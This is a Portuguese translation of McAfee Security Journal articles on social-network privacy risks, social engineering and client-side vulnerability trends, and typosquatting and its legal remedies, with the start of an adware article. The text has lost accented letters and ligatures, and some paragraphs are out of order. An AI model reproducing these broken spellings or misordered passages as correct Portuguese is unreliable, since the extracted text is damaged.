Os sites conhecero os seus interesses com base no seu comportamento: sites que voc visita, artigos que voc l, msica que voc ouve, amigos com quem voc conversa e os interesses dos seus amigos, por exemplo. Essas informaes sero utilizadas para manter voc atualizado sobre mudana de eventos e para ltrar as informaes esprias que bombardeiam os usurios atualmente. Voc ter uma experincia altamente personalizada na Web que exigir muito pouca entrada de informaes diretamente por parte do usurio. Enquanto a Web 1.0 dirigida por administradores de sites e a Web 2.0 dirigida por contedo gerado pelos usurios, o futuro das redes sociais reside nos relacionamentos entre usurio e contedo, potencializados pelo comportamento do usurio para adequar o contedo. As primeiras manifestaes da prxima gerao de sites, chamada Social Networking 3.0, podem, de fato, ser percebidas como intrigantes pelo nvel de preciso de sua inteligncia articial. Os pers tm uma conotao diferente em um ambiente como esse, onde o site pode realmente agregar usurios com interesses em comum. Sob determinados aspectos, os pers de compatibilidade utilizados pelos servios de encontros on-line podem ser considerados uma verso preliminar da criao de conexes sociais atravs de pers on-line, reunindo pessoas; mas na Social Networking 3.0 esse conceito ser signicativamente expandido sem a necessidade de se preencher longos questionrios. Toda vez que voc clica em um link, avalia um blog ou conversa em um chat sobre um determinado assunto, o site pode levantar informaes sobre voc para aprimorar a sua rede social. Quem vai se beneciar dessa exploso de correlao de informaes? Naturalmente, a base de usurios um fator de motivao, mas outros buscam se beneciar desse arranjo. Os anunciantes esto entusiasmados com a idia de taxas de converso mais altas quando o marketing acontece no nvel dos usurios, com base nos interesses especcos destes. A maioria dos usurios realmente prestar ateno aos anncios e se interessar por seu contedo.
de reputao de contedo e sites podem ajudar a equilibrar usabilidade e segurana. A relao de conana entre os sites e os usurios a chave para o sucesso das redes de amanh. Aviolao dessa conana pode levar derrocada de toda uma comunidade. O uso maior de pers abertos e portteis, mash-ups (aplicativos Web que combinam contedo de vrias origens em uma nica ferramenta) e APIs abertas facilitaro tremendamente a utilizao entre sites, mas tambm aumentaro a complexidade da defesa contra ameaas que visem esses vetores. Os ataques multifacetados so difceis de identicar atualmente e sero ainda mais no futuro. Os ataques podem se originar de um site e ser propagados atravs de outro antes de aparecer em uma rede social afetada. Defesas com base no host precisaro administrar os relacionamentos que os sites tm uns com os outros para determinar quais so as interaes vlidas e invlidas entre os sites e separar o joio do trigo. Muitos usurios acharo as preocupaes deste artigo com a privacidade (coleta e correlao de informaes e rastreamento de localizaes) grandes demais para serem ignoradas. Certamente, muitas pessoas no vo aderir a tais servios. Noentanto, quando os usurios virem que podem se beneciar fornecendo um pouco de informao e quando tiverem estabelecido relacionamentos conveis, muitos fornecero alguns detalhes voluntariamente. Os fornecedores esto perfeitamente cientes disso e esto encorajando os usurios a dar passos curtos, como permitir que os locais sejam informados de forma granular, somente dentro de cada estado ou cidade, por exemplo. Infelizmente, predadores on-line estaro espreita e as vulnerabilidades de segurana podem ter conseqncias terrveis quando tanta informao cai nas mos de malfeitores. Este um momento interessantssimo para os sites de rede social, os quais esto se expandindo rapidamente, acrescentando funcionalidade e aumentando suas bases de usurios. Esses sites so avaliados em vrios bilhes de dlares. H no horizonte grandes mudanas, tanto atraentes quanto ameaadoras. De muitas formas, o futuro dos sites de rede social dene o futuro da prpria Internet.
Aumento dos riscos

Conforme aumentam as vantagens para os usurios, aumentam tambm as oportunidades para os atacantes. Spammers e golpistas procuraro explorar esse lo de informaes e construiro mais facilmente ataques convincentes de engenharia social com todos esses dados. Os usurios sero surpreendidos com a guarda baixa pelo nvel de detalhamento e de personalizao das mensagens dos ataques. Redes de bots sociais tambm tero o potencial de perturbar seriamente o ecossistema, envenenando a rede com solicitaes e falsos testemunhos. Os administradores dos sites tero grande trabalho para manter alta a qualidade do contedo, bloquear os malfeitores e ainda permitir que todos os demais utilizem o site da forma pretendida. A proteo das futuras redes sociais depender muito das defesas de servidor. Os sistemas back-end precisaro fazer varredura de grandes quantidades de dados de entrada e de sada, em busca de provas de m conduta ou cdigo malicioso. Os servios
O pesquisador de ameaas Craig Schmugar pesquisa e combate ameaas para o McAfee Avert Labs desde 2000. Desde ento, descobriu e classicou milhares de novas ameaas, incluindo os worms Blaster, Mydoom, Mywife e Sasser. Ele admite que, durante esse tempo, comeou a se sentir mais anti-social.
Notas de rodap 1 http://cwe.mitre.org/documents/vuln-trends/index.html

2 http://www.facebook.com/press/info.php?statistics 3 http://www.zdnet.com.au/news/security/soa/Spyware-claims-kill-off-Facebooks-Secret-Crush/0,130061744,339284896,00.htm?omnRef=http://www.google. com/search?num=100
30
A face mutvel das vulnerabilidades

Por Rahul Kashyap
Embora a engenharia social no tenha parte em todas as formas de ameaa de segurana, o McAfee Avert Labs observou recentemente uma tendncia crescente: criadores de malware utilizando engenharia social para explorar vulnerabilidades de software.
A maioria dos infames worms de Internet da primeira metade desta dcada costumavam explorar uma ou mais vulnerabilidades de aplicativos da Microsoft. Os notrios Sasser, Blaster, Code Red e SQL Slammer tinham um fator em comum. (Apropsito, o Avert Labs descobriu o Sasser e o Blaster, bem como outros importantes tipos de malware.) Todos exploravam vulnerabilidades de servidor. O intuito desses worms era destruir servidores atravs de uma rpida autopropagao aps explorar as falhas. Embora produtos de vrios fornecedores tenham sofrido com brechas de segurana semelhantes, vamos nos concentrar principalmente em vulnerabilidades e tendncias em produtos da Microsoft neste artigo. No estamos criticando a Microsoft por ser particularmente vulnervel, mas reconhecendo que a popularidade dos produtos Microsoft entre os consumidores e empresas atrai os criadores de malware e ladres de dados como nenhum outro alvo. O Avert Labs percebeu que as vulnerabilidades de servidor que podem ser exploradas por worms diminuram nos ltimos anos, graas ao aumento da utilizao de medidas de segurana que protegem chamadas a procedimentos remotos. Para ilustrar isso, a gura 1 mostra todas as vulnerabilidades explorveis remotamente atravs de chamadas a procedimentos remotos no Microsoft Windows durante um perodo de 10 anos desde o primeiro trimestre de 2008. A tendncia foi de queda considervel nos dois ltimos anos. Vemos uma tendncia semelhante quando analisamos vulnerabilidades explorveis remotamente em outras plataformas populares de servidor da Microsoft, como IIS Web Server, SQL Server e outras. A Microsoft aumentou ainda mais suas defesas com o lanamento do Service Pack 2 para Windows XP. Juntamente com outros mecanismos de proteo, o SP2 incluiu preveno de execuo de dados,2 que, embora no seja toda prova,3 ajudou denitivamente a deter a propagao de worms pela rede, problema que afetava o Windows na poca. Os efeitos do SP2 do XP tornaram-se muito mais visveis alguns anos depois, medida que muitos usurios migravam para o sistema operacional atualizado. No entanto, os criadores de malware no cariam para trs. Eles rapidamente mudaram o enfoque do servidor para os clientes, descobrindo vulnerabilidades no Microsoft Ofce, Microsoft Internet Explorer e em vrios formatos de arquivo proprietrios. O assalto aos clientes deu origem a uma variedade de fuzzers4 (que procuram brechas na segurana jogando dados aleatrios em um aplicativo), bugs de anlise de linguagem de script e vulnerabilidades relacionadas a controles ActiveX. Projetos como o Month of Browser Bugs5 (e outros), axfuzz,6 COMRaider e hamachi7 aumentaram o interesse nessa rea e ajudaram a expor os
Correes de vulnerabilidades remotas da Microsoft

14 12 10 8 6 4 2 0 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008
Figura 1: A Microsoft aprimorou consideravelmente a segurana de suas chamadas a procedimentos remotos desde 2006. (Fonte: Microsoft1).
31
45 40 35 30 25 20 15 10 5 0
Correes de vulnerabilidades do Ofce
Ataques direcionados
A chave para as vulnerabilidades dos clientes que elas precisam de interao com o usurio para serem exploradas. Por isso, os autores de malware tiveram de inventar maneiras mais inovadoras de induzir os usurios a clicar em links e a fazer download de imagens e documentos da Internet. Um dos principais incentivos para a explorao de sistemas clientes tem sido o rpido crescimento do spam que se baseia em engenharia social. A engenharia social e o enfoque nas vulnerabilidades dos clientes andam de mos dadas. A conexo entre esses dois fatores bvia e a ameaa tornou-se mais complexa recentemente.
1998
1999
2000
2001
2002
2003
2004
2005
2006
2007
2008
Figura 2: As vulnerabilidades do Microsoft Ofce aumentaram em 2006 e permaneceram altas nos dois anos seguintes. (Fonte: Microsoft).
inmeros problemas que afetavam o software cliente. A descoberta de bugs e a explorao de aplicativos clientes teve seu pico durante esse perodo. Essa tendncia continua at mesmo agora, durante a preparao desta revista. A quantidade de software cliente sendo explorada difcil de determinar, mas algumas fontes armam que est por volta das centenas de milhes.8 A gura 2 oferece uma viso clara do sbito pico de vulnerabilidades do Microsoft Ofce. Estas atingiram um mximo em 2006 e continuam a manter a Microsoft ocupada. A maioria dessas vulnerabilidades afetou o Ofce 2000. Essa verso amplamente utilizada e, por isso, foi mais amplamente explorada. Do ponto de vista nanceiro dos criadores de malware, as vulnerabilidades do Ofce 2000 oferecem um retorno melhor do investimento. conseqncia do pacote ter, durante muito tempo, uma grande decincia de segurana: Os usurios do Ofce 2000 precisam visitar a pgina Atualizao do Ofce para fazer download de correes9; as atualizaes on-line automticas no atendem o Ofce 2000 nem o Ofce 97. Esse descuido propicia uma excelente oportunidade para os criadores de malware explorarem o fato de que muitos usurios provavelmente no atualizaro regularmente seus pacotes Ofce.10 O nmero de mquinas zumbis que passaram a ser controladas remotamente devido a esse tipo de brecha de segurana pode estar em torno das dezenas de milhares. Embora estejamos discutindo vulnerabilidades em produtos da Microsoft neste artigo, a tendncia afeta outros fornecedores de software cliente populares, como Adobe, Mozilla, Apple e outros. O Month of Apple Bugs (ms dos bugs da Apple) chamou a ateno para muitos problemas do cliente e houve um grande surto nas vulnerabilidades encontradas em software amplamente utilizado, como Apple QuickTime, Adobe Flash Player e Adobe Reader, para citar apenas alguns. A recente explorao da vulnerabilidade PDF mailto: (CVE-2007-5020)11 e de Flash utilizando ActionScript (CVE-2007-0071) esto entre algumas das falhas crticas que afetaram milhares de usurios.
Parte dessa complexidade reside nos ataques de engenharia social direcionados, que so uma tendncia emergente no cenrio das ameaas. Os ataques direcionados so especialmente populares nas instituies de defesa e militares.12 Desde a exploso de vulnerabilidades do Ofce em 2006, surgiram vrios relatrios sobre agncias governamentais recebendo emails com arquivos maliciosos do Word, PowerPoint ou Access. Parece que a combinao de engenharia social com vulnerabilidades encontrou um outro alvo: espionagem. A espionagem , naturalmente, mais furtiva e mais difcil de se descobrir do que um ataque motivado meramente pelo lucro. Em diversas ocasies, as vulnerabilidades descobertas nesses documentos maliciosos incorporados eram ataques zero-day, o que torna esses arquivos de documentos ainda mais difceis de detectar: essas vulnerabilidades costumam ser encontradas somente aps o dano estar feito. Como essas vulnerabilidades zero-day tiveram como alvos instalaes militares e governamentais especcas, possvel que esses ataques tenham sido patrocinados por governos ou agentes estrangeiros. Engenharia social personalizada, vulnerabilidades zero-day, dinheiro e poder soam como elementos de uma novela de John le Carr. Alguns analistas de segurana acreditam que isso no co. Muitos tericos previram que a guerra da prxima gerao ser travada no ciberespao. Seriam todos esses eventos apenas testes para uma guerra ciberntica?
Hacks furtivos na Web

Outras exploraes que mudaram nos ltimos anos so hacking e seqestro de servidores Web. Os primeiros atacantes costumavam desgurar os sites aps hacke-los normalmente deixando um aviso no site, na esperana de carem famosos. Isso no ocorre mais, pelo menos no com a atual nova gerao de hackers sosticados. Com a variedade de vulnerabilidades de clientes, os hackers comearam a explor-las de uma maneira coordenada, disseminando o malware, primeiro comprometendo sites populares, implantando o malware furtivamente e atraindo os usurios com truques de engenharia social. Como um bom exemplo disso, o hack do Super Bowl (nal de futebol americano) de fevereiro de 2007 merece ser mencionado, pois envolveu a insero de um JavaScript malicioso na pgina
32
principal do site ocial.13 O script explorava duas falhas do Internet Explorer e infectava usurios desatualizados com um cavalo de Tria que se conectava a um servidor chins, dando pleno acesso mquina comprometida. Hacks furtivos semelhantes foram relatados em relao a vrios sites populares, incluindo embaixadas, grupos de discusso e corporaes. Uma outra ameaa emergente que deixou milhes de residncias vulnerveis foi a explorao de roteadores domiciliares atravs do Universal Plug and Play, o qual permitiu que um arquivo Flash malicioso incorporado em uma pgina da Web recongurasse o roteador da vtima.14 (O fato de que a grande maioria dos usurios de Internet utiliza as senhas padro em seus roteadores domiciliares ajuda a tornar esse ataque possvel.) Nessa situao, a vtima poderia ser induzida, por qualquer link aparentemente inofensivo, a pagar contas on-line ou a ler mais sobre algum tpico. Muito provavelmente o usurio no teria a mnima idia de que o roteador foi comprometido, com todo o trfego incluindo senhas condenciais sendo enviado para mais algum.
Esta pode ser a ocasio perfeita para essas tcnicas alavancarem truques de engenharia social como um dos vetores de ataques por vrias razes:
Atualmente, no h nenhuma maneira automatizada, convel e conhecida publicamente de explorar essas novas tcnicas (principalmente para propagao em massa). Elas podem ser facilmente testadas em determinados indivduos ou grupos atravs de engenharia social como parte do processo de desenvolvimento. O retorno do investimento com essas tcnicas maior utilizando engenharia social do que com o trabalho de pesquisar ainda mais para atingir a propagao em massa.
Concluso
Com as recentes tendncias em vulnerabilidades, a engenharia social uma fora difcil de combater. No importa quantos mecanismos de proteo os fornecedores implementem em seus sistemas operacionais e software, uma engenharia social ecaz pode subverter todos eles, se os usurios continuarem clicando em qualquer link que aparecer pela frente. No se pode esperar que as leis do ciberespao detenham a engenharia social to cedo (excetuando a aplicao de multas por fraude), mas uma melhor educao certamente pode ajudar a minimizar as perdas e o impacto sobre vtimas incautas. Enquanto isso, pense duas vezes quando for solicitado a clicar em aceitar aquele prmio que voc acabou de ganhar!
Novos vetores de explorao

A primeira metade desta dcada testemunhou uma extensiva explorao de estouros de pilha, de heap e de inteiro, vulnerabilidades de string de formato e outras decincias, a maioria das quais relativamente fcil de explorar, do ponto de vista tcnico. Agora, porm, a maioria desses simples estouros de pilha no mais uma grande ameaa em software amplamente utilizado, como o Windows, devido ao melhor desenvolvimento de software e testes para assegurar a qualidade. Alm disso, tecnologias, como aleatorizao do espao de endereos, desaaram os hackers a ir alm dos mecanismos tradicionais de explorao. O ataque a vulnerabilidades entrou em uma nova fase, na qual a explorao de conceitos como apontadores nulos15 e condies de corrida (race conditions)16 bem como o desenvolvimento de tcnicas conveis de explorao, como heap spray17 est ganhando popularidade. Muitos desses bugs so conhecidos h muito tempo e eram considerados inexplorveis.
Rahul Kashyap gerente de pesquisa de vulnerabilidades e segurana de IPS do McAfee Avert Labs. Ele responsvel por pesquisa de vulnerabilidades, anlise zero-day, contedo de sistemas de preveno de intruses e resposta a emergncias. Kashyap um grande f do Dilbert e pretende, algum dia, desenhar a sua prpria tirinha de quadrinhos nerd inspirada em segurana de computadores.
Notas de rodap 1 http://www.microsoft.com/technet/security/current.aspx

2 How to Congure Memory Protection in Windows XP SP2 (Como congurar proteo de memria no Windows XP SP2). http://www.microsoft.com/technet/security/prodtech/windowsxp/depcnfxp.mspx 3 Analysis of GS protections in Microsoft Windows Vista. (Anlise de protees GS no Microsoft Windows Vista). http://www.symantec.com/avcenter/reference/GS_Protections_in_Vista.pdf 4 Browser Fuzzing for fun and prot (Fuzzing de navegador por diverso e por lucro). http://blog.metasploit.com/2006/03/browser-fuzzing-for-fun-and-prot.html 5 Month of Browser Bugs (Ms dos bugs de navegador). http://blog.metasploit.com/2006/07/month-of-browser-bugs.html 6 AXFUZZ: An ActiveX/COM enumerator and fuzzer (AXFUZZ: Um fuzzer e enumerador ActiveX/COM). http://sourceforge.net/projects/axfuzz/ 7 Hamachi, por H D Moore e Aviv Raff. http://metasploit.com/users/hdm/tools/hamachi/hamachi.html 8 637 million Users Vulnerable to Attack (637 milhes de usurios vulnerveis a ataques), Frequency X. http://blogs.iss.net/archive/TheWebBrowserThreat.html 9 Keep your operating system updated: Frequently asked questions (Mantenha o seu sistema operacional atualizado: perguntas freqentes). http://www.microsoft.com/protect/computer/updates/faq.mspx
10 MS Ofce Flaws Ideal Tools for Targeted Attacks (Falhas do MS Ofce que so ferramenta ideais para ataques direcionados). http://blog.washingtonpost.com/ securityx/2006/04/ms_ofce_aws_ideal_tools_fo_1.html 11 http://www.gnucitizen.org/blog/0day-pdf-pwns-windows/ 12 The New E-spionage Threat (A nova ameaa de espionagem eletrnica). http://www.businessweek.com/print/magazine/content/08_16/b4080032218430.htm 13 Dolphins Web sites hacked in advance of Super Bowl (Sites do Dolphins atacados em antecipao ao Super Bowl). http://www.networkworld.com/news/2007/020207-dolphins-web-sites-hacked-in.html 14 Hacking the interwebs (Hackers nas interwebs), 12 de janeiro de 2008. http://www.gnucitizen.org/blog/hacking-the-interwebs/ 15 Application-Specic Attacks: Leveraging the ActionScript Virtual Machine (Ataques especcos de aplicativos: alavancando a ActionScript Virtual Machine). http://documents.iss.net/whitepapers/IBM_X-Force_WP_nal.pdf 16 Unusual Bugs (Bugs incomuns), Ilja van Sprundel. http://www.ruxcon.org.au/les/2006/unusual_bugs.pdf 17 Heap Feng Shui in JavaScript (Feng Shui do heap em JavaScript). http://www.determina.com/security.research/presentations/bh-eu07/bh-eu07sotirov-paper.html ( necessrio se registrar)
33
Aventuras inadvertidas na navegao

Por Benjamin Edelman
Navegue pela Web e voc pode ser exposto a uma variedade de ataques muito bem comentados nas crnicas do McAfee Security Journal.
De banners maliciosos a agregadores de adware, os sites que voc pretende visitar podem causar danos considerveis. Portanto, os usurios precisam estar cientes dos sites que no desejam visitar os sites com os quais se deparam acidentalmente. razo, que os navegadores acrescentaro automaticamente um .com a um domnio sem domnio de nvel mais alto por isso, os typosquatters tambm reivindicam domnios como www.mcafeecom.com. Outros typosquatters concentramse no acrscimo de prexos http ou no registro dos .com correspondentes aos domnios nos quais realmente residem outros domnios de nvel mais alto. Como os usurios acabam chegando nesses sites de typosquatting? Alguns usurios podem esquecer a graa correta de um site. Outros cometem erros de digitao. (Considere falantes no nativos de ingls, usurios com decincia visual e usurios que ainda esto aprendendo a datilografar). Usurios inexperientes podem no perceber a pontuao correta do endereo completo de um site e usurios apressados podem digitar incorretamente parte de um URL. Mesmo o usurio mais experiente pode cometer um erro de digitao em um dispositivo mvel com um teclado pequeno, em um tablet com reconhecimento de caligraa ou com o sacolejar de um veculo em movimento. Portanto, seria errado culpar os usurios por solicitar sites de typosquatting. Pelo contrrio: embora os usurios certamente cheguem a esses sites, eles geralmente chegam l por engano.
Estratgia bsica
Para aqueles dentre ns que cometem deslizes ocasionais ao digitar um URL, existe um tipo especial de ameaa de segurana do qual se prevenir. Essa praga do digitador imperfeito chamada de typosquatting. A estratgia do typosquatter (ou seja, quem pratica o typosquatting) prever os nomes de domnio que os usurios podem solicitar acidentalmente. Imagine um usurio que digite incorretamente bankofamerica. com duplicando o k e no digitando o e, resultando em bankkofamrica.com. Em condies normais, o usurio receberia uma mensagem de erro do navegador, direcionando o usurio ao verdadeiro site do Bank of America. No entanto, suponha que um typosquatter tenha antecipado o erro do usurio. O typosquatter pode registrar o domnio escrito incorretamente (e vrios outros nomes errados) na esperana de que os usurios eventualmente cheguem l. Historicamente, os typosquatters concentram-se principalmente em erros ortogrcos inserindo uma letra espria, deixando uma letra de fora ou trocando duas letras uma pela outra. Porm, recentemente, os typosquatters descobriram outros truques para atrair trfego no intencional. Suponha que um usurio omita o ponto que separa www do nome de domnio de um site, por exemplo, wwwmcafee.com em vez de www.mcafee. com. Typosquatters podem registrar esse domnio. (Alis, algum j o fez! E a McAfee est trabalhando para recuperlo.) No caso de pontos nais, os typosquatters antecipam, com
O escopo do typosquatting
Com muitos usurios cometendo uma ampla variedade de erros, o typosquatting tornou-se extraordinariamente difundido. O servio McAfee SiteAdvisor faz buscas por typosquatters continuamente e, no exame de maio de 2008 do McAfee Avert Labs, encontramos mais de 80.000 domnios com typosquatting de apenas 2.000 dos sites principais da Web. Entre mais fundo na Web e o typosquatting cresce ainda mais.
34
Domnios freqentados por crianas so alvos particularmente ricos para typosquatters. Por exemplo, uma anlise recente identicou 327 registros de typosquatting diferentes, todos variantes prximas de cartoonnetwork.com. Freecreditreport.com liderou a lista compilada com tecnologia SiteAdvisor. Outros sites populares foram YouTube, Craigslist, Wikipedia e Bank of America. (Para conhecer os nmeros, veja a gura 1. Para exemplos de variaes ortogrcas criativas, consulte o Apndice.)
Policy (UDRP) estabelece arbitragem para reclamaes sobre domnios infratores. Para registrar um site em um grande domnio de nvel mais alto, o solicitante precisa concordar com a jurisdio da UDRP, a qual se aplica independente da localizao do site de typosquatting. Dito isso, as reparaes da UDRP limitam-se ao consco de um domnio infrator sem indenizao por perdas monetrias. Embora a ACPA imponha penas signicativas, os typosquatters parecem ter constatado que sua aplicao improvvel. Ento, apesar da ameaa de sanes mais severas, os typosquatters continuam a operar livremente.
Resposta jurdica
De maneira geral, o typosquatting ilegal nos Estados Unidos. Alei Anti-cybersquatting Consumer Protection Act (ACPA), 15USC 1125(d), de 1999, probe o registro, trco ou utilizao de nomes de domnio que sejam idnticos ou confusamente semelhantes a uma marca comercial ou nome famoso. A ACPA reconhece danos pelos lucros ilcitos auferidos pelo typosquatter (15 USC 1117(a)(1)) ou danos previstos em lei, de US$1.000 a US$100.000 por typosquatting de domnio (conforme apreciao da corte) (1117(d)). As leis de outros pases tratam o typosquatting de maneira um pouco diferente, mas a maioria das naes v o typosquatting como uma forma de violao de marcas comerciais por isso a proibio. Alm disso, a poltica Uniform Dispute Resolution
Estratgia de lucros dos typosquatters

Assim que um usurio chega em um site de typosquatting, o typosquatter tenta ganhar tanto dinheiro quanto possvel. Alguns anos atrs, o notrio typosquatter John Zuccarini forou seus visitantes incautos a visualizar sites de sexo explcito que eles no queriam e que no tinham solicitado. Zuccarini registrou pelo menos 8.000 domnios, os quais eu documentei amplamente.1 Mas sua fraude no cou impune para sempre: Em setembro de 2003, Zuccarini foi preso por violao da lei Truth in Domain Names Act, que probe especicamente qualquer ao que utilize um nome de domnio enganoso com o intuito de ludibriar a pessoa e faz-la ver obscenidades. Nos dias de hoje, a abordagem padro dos typosquatters so os anncios. Dos milhares de domnios de typosquatting que eu examinei em muitos anos, raro encontrar algum que no mostre anncios.
DOMNIO
NMERO DE DOMNIOS DE TYPOSQUATTING
freecreditreport.com cartoonnetwork.com youtube.com craigslist.org blogspot.com clubpenguin.com wikipedia.com runescape.com miniclip.com bankofamerica.com dailymotion.com metroflog.com addictinggames.com friendster.com myspace.com verizonwireless.com facebook.com
742 327 320 318 276 271 266 264 263 251 250 249 248 246 239 238 235
O servio McAfee SiteAdvisor executa continuamente buscas por typosquatters e, no exame do McAfee Avert Labs de maio de 2008, encontramos mais de 80.000 domnios com typosquatting de apenas 2.000 dos sites principais da Web.
Figura 1: A lista dos mais populares do typosquatting. Essa tabela mostra uma seleo de marcas comerciais altamente visadas pelos typosquatters. Os dados so do exame de maio de 2008 do conjunto de dados do servio SiteAdvisor.
35
Figura 2: Um typosquatter registra um nome de domnio semelhante a um grande banco e, ento indiretamente vende links de anncios para esse e outros bancos.
Quando os sites de typosquatting mostram anncios, eles costumam tentar selecionar anncios relevantes de acordo com o site ao qual o usurio estava (muito provavelmente) tentando chegar. Assim, no exemplo do bankkofamrica.com que mencionamos, os anncios resultantes promovem como era de se esperar bancos. Quais bancos? O primeiro da lista o prprio Bank of America. (Veja a gura 2.) Surpreso? Por outro lado, a colocao desse anncio til para o Bank of America: pelo menos eles conseguiram alcanar o cliente, apesar do erro tipogrco deste. Mas, por outro lado, curioso que esse typosquatter pea ao Bank of America que pague para atingir um cliente que j havia solicitado o Bank of America pelo nome. Anal, o typosquatter est infringindo a marca comercial do Bank of America, violando especicamente a ACPA, que diz que o typosquatter no pode registrar tais domnios e que
o typosquatter precisa at mesmo pagar ao Bank of America elevadas quantias por danos previstos em lei caso o banco resolva process-lo. Mas, em vez disso, o typosquatter acaba vendendo espao de propaganda para o Bank of America o qual pode, pelo menos inicialmente, estar totalmente alheio a isso. Como isso possvel? Os typosquatters no vendem espao diretamente aos anunciantes. (Imagine a conversa: Gostaramos de exibir os seus anncios em nosso site de typosquatting. Voc quer colocar nossos anncios onde?) Em vez disso, os typosquatters vendem seu inventrio para redes de anncios que, por sua vez, recrutam os anunciantes. A maior rede nesse espao o Google, cujo produto AdSense for Domains e outros produtos de monetizao de domnios servem anncios em mais de 80% dos sites de typosquatting recentemente descobertos pela tecnologia SiteAdvisor.
36
Qual a prxima jogada dos typosquatters?

Em junho de 2008, a Internet Corporation for Assigned Names and Numbers (ICANN) votou pela acelerao do processo de criao de mais domnios de nvel mais alto. Alm dos domnios familiares que a maioria dos usurios conhece, j existem domnios menos utilizados, como .info, .biz, .museum e .travel. Podemos esperar que haja, em breve, novos domnios como .nyc ou .lib (como alguns sugeriram). Mais domnios de nvel mais alto signicam mais oportunidades para cybersquatting para o registro exato de marcas famosas ou para verses tipogracamente prximas de nomes famosos. Quando os usurios solicitam esses domnios seja em tentativas desorientadas de chegar aos sites verdadeiros ou em tentativas errneas de lembrar os verdadeiros endereos dos sites os typosquatters podem entrar em cena com seus intrusos ilegais. Contudo, existem sinais de que o typosquatting pode entrar em declnio em breve. Por um lado, alguns grandes sites tomaram providncias para se proteger e a seus clientes contra os typosquatters. Em 2006, por exemplo, Neiman Marcus processou o registrador de domnios Dotster. Neiman Marcus alegou que o Dotster registrou inmeros domnios que infringiam marcas de Neiman Marcus, mostrando anncios para maximizar seus lucros com esses sites de typosquatting. Neiman Marcus alegou que o Dotster atuou no apenas como registrador desses domnios, mas tambm como registrante, escolhendo quais domnios registrar e amealhando os lucros dos anncios resultantes. A questo foi decidida em 2007 em termos condenciais e Neiman Marcus, desde ento, prosseguiu processando outros grandes typosquatters. (Informao relevante: eu atuei como consultor para Neiman Marcus em alguns desses casos.) A Verizon e a Microsoft tambm foram cautelosas em litgios semelhantes. Por um lado, esses casos no so particularmente predominantes. No entanto, os danos previstos em lei da ACPA US$1.000 ou mais por domnio podem forar os typosquatters a pagar caro por suas infraes em larga escala. S a Microsoft recebeu mais de US$2 milhes em acordos sobre typosquatting. Alm disso, rumores constantes sugerem que as grandes redes de anncios, particularmente o Google, podem abandonar a indstria do typosquatting. Uma recente demanda judicial de um detentor de marcas comerciais questionou o papel do Google na fundao da indstria do typosquatting e essas colocaes de typosquatting foram uma fonte recorrente de reclamaes de anunciantes
e detentores de marcas comerciais. Se o Google deixasse de nanciar o typosquatting, os typosquatters teriam bem menos incentivos para registrar domnios infratores. Provavelmente nenhuma outra rede de anncios pagaria aos typosquatters tanto quanto o Google. (Informao relevante: eu atuei como coassessor no caso Vulcan Golf, et al., contra Google, et al., sobre propriedade de marcas comerciais, em relao responsabilidade do Google pelos sites de typosquatting nos quais o Google paga para colocar anncios).
Defesas
Embora as batalhas do typosquatting continuem, usurios preocupados podem fazer bastante para se proteger. Primeiro, cuidado com o que voc digita. Esteja alerta para o typosquatting, particularmente ao solicitar um site difcil de soletrar. Adivinhar um nome de domnio pode no ser a melhor opo. Considere o uso de um mecanismo de busca. Segundo, aps chegar a um site, olhe duas vezes antes de continuar. realmente esse o site que voc pretendia achar? Esse link um simples apontador ou um anncio pago? Esse site governamental seria mesmo um .com ou voc queria o .gov correspondente? Um pouco de senso crtico pode lhe servir bem como defesa contra typosquatting ou outros ataques. Um software apropriado tambm pode ajudar a proteger os usurios contra typosquatters. A tecnologia SiteAdvisor identica muitos sites de typosquatting. Um servio de proteo tipogrca, como o OpenDNS, oferece proteo adicional. Os mecanismos de busca costumam oferecer ajudar Voc quer dizer correo ortogrca para que os usurios possam evitar muitos sites de typosquatting executando buscas em vez de digitar nomes de domnio diretamente na barra de endereos do navegador.
Benjamin Edelman professor assistente na Harvard Business School, onde estuda mercados eletrnicos e fraude on-line. Ele tambm um consultor especial da McAfee sobre o servio SiteAdvisor, oferecendo uma perspectiva independente para complementar as classicaes de sites do SiteAdvisor. Embora seja um digitador rpido e preciso, o professor Edelman embarcou, ocasionalmente, em aventuras de navegao indesejadas.
Notas de rodap 1 Large-Scale Registration of Domains with Typographical Errors(Registro em

larga escala de domnios com erros tipogrcos), janeiro de 2003. Harvard Law School. (http://cyber.law.harvard.edu/archived_content/people/ edelman/typo-domains/)
APNDICE Exemplos de sites de Typosquatting: Cartoonnetwork.com

Entre os mais de 80.000 domnios nos exames de maio de 2008 do SiteAdvisor, encontramos estas variaes de typosquatting do cartoonnetwork.com: ccartoonnetwork.com dcartoonnetwork.com ncartoonnetwork.com cfartoonnetwork.com ceartoonnetwork.com ckartoonnetwork.com jcartoonnetwork.com vcartoonnetwork.com caertoonnetwork.com caortoonnetwork.com cairtoonnetwork.com cuartoonnetwork.com acartoonnetwork.com bcartoonnetwork.com canrtoonnetwork.com
37
O que aconteceu com o Adware e o Spyware?

Por Aditya Kapoor
Adware e spyware so duas das principais ferramentas utilizadas para a promoo on-line de propaganda e marketing.
Esses aplicativos costumam se beneciar das metodologias de engenharia social e freqentemente se anexam a outros aplicativos freeware ou shareware teis que um usurio queira obter por download. Esses aplicativos indesejados costumam vir com contratos de licena de usurio nal (EULAs) que supostamente denem seu comportamento. No entanto, essas descries normalmente no so explcitas ou teis, causando confuso para os usurios e abrindo as portas para mais armadilhas de engenharia social. Na primeira metade desta dcada, o adware e o spyware, freqentemente chamados de programas potencialmente indesejados, ou PUPs, cresceram exponencialmente. Depois de 2005, porm, vimos um declnio constante em seus nmeros. Neste artigo vamos destacar as mudanas fundamentais nos modelos de compensao on-line que so o fator relevante por trs desse declnio. O adware e o spyware, na maior parte, dividiram-se em campos distintos: o primeiro, com aplicativos mais limpos e um modelo melhor de consentimento do usurio desenvolvido pelos principais atores da cena do adware, e o segundo, s vezes malicioso, freqentemente denido como malware cavalo de Tria. Essa diviso comparativamente limpa ajudou a manter o nmero de aplicativos de adware e spyware baixo. Ento, se esses PUPs no so mais uma ameaa, em breve eles tero ido embora para sempre? Para responder a essa pergunta, discutiremos o cenrio mutvel de ameaas e o papel desempenhado pela engenharia social.
